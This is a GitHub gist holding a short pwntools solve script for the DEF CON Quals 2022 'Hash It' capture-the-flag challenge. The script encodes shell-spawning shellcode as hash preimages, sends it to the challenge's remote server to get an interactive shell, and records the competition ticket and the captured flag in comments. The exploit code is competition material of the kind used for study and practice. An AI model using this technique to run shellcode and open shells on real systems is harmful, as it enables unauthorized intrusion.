Created
May 30, 2022 03:17
-
-
Save maple3142/f0ba186ca8b8256d8d9dadd977369e4a to your computer and use it in GitHub Desktop.
DEF CON Quals 2022 - Hash It
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
from hashlib import * | |
context.log_level = "debug" | |
context.arch = "amd64" | |
def find_pre(h, t): | |
for a in range(256): | |
for b in range(256): | |
if h(bytes([a, b])).digest()[0] == t: | |
return bytes([a, b]) | |
sc = asm(shellcraft.sh()) | |
fns = [md5, sha1, sha256, sha512] | |
payload = b"" | |
for i, x in enumerate(sc): | |
payload += find_pre(fns[i % 4], x) | |
# io = process('./zc7ejjq9ehhcqj1x61ekoa8pjtk7') | |
io = remote("hash-it-0-m7tt7b7whagjw.shellweplayaga.me", 31337) | |
io.sendlineafter( | |
b"Ticket please: ", | |
b"ticket{CormorantPoopdeck584n22:CZnq3tHN3ufHF_ONI8eIrZH5H27yzqcMcDBHg6OnbKtsIPA3}", | |
) | |
io.send(len(payload).to_bytes(4, "big") + payload) | |
io.interactive() | |
# flag{CormorantPoopdeck584n22:MNM8QuNum-acrWp3RUuWBeqOYtXja-q3lK1dPipahdYfCb4Yz08Jg71oN3Xln9mmiQvJq95kCk1dEYHaugn9Ug} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment